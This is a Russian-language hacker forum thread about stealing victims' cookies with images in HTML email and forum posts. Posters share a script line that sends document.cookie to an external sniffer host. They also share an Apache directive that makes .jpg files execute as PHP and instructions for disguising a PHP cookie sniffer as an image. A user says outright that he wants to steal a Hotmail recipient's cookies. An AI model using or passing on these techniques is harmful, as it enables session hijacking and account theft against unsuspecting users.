Cookie через рисунки
 

Слыхал можно cookie красть через рисунки на активных хсс.
у кого есть идеии

:) Товарисчь, картинки - это не в прямом смысле, ты имеешь в виду файлы с расширением jpg которые интерпретируються сервером как php скрипт...

Таким образом - AddType application/x-httpd-php .jpg

нет например жертве маил в хтмл формате отправим, с рисунками. а в рисунках xss на наш сниффер

Ты имеешь ввиду вот это?

Примеры использования сниффера:
Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

(с) old.antichat.ru

А эта "картинка" является собой пхп кодом, выполняющимся на сервере и сохраняющая кукисы жертвы

2 ой варриант
но как закапывать коды в рисунок.
например я хочу отправить писмо по хотмаил и когда он откроет писмо куки шли на мой сниффер

Для начала создаешь файл s.php в него пишешь код снифера, затем переименовываешь в s.jpg

Скачать снифер можно с http://kanick.ru, полазий по архиву и разберешься

статейка про это ... тут

.....

у тебя internet explorer 7, а видимо надо 6 чтобы работало

Мой IE7 открыл эту ссылку как текст такого содержания:

Точняк! Я только что вспомнил что у меня на ноутбуке старая версия Ie и реально пашет! Спасибо!

http://forum.antichat.ru/thread6137.html
http://forum.antichat.ru/thread9910.html

хз.. но если картинку закинуть на любой веб-сервер и открывать оттуда то работает тема на любый версиях Ie. тестил на 5,6 и 7....

почему сделал такую картинку! пробовал вместо аватарки и на форуме картикой впихнуть полчучилось, но куки неидут мне. а хотя когда я положил картинку на хост открыл мне пришел ип но без кук само сабой, а когда картинка на форуме лежит ваще ниче неидет!

Необходимо, чтобы юзер заходил на твою картинку напрямую.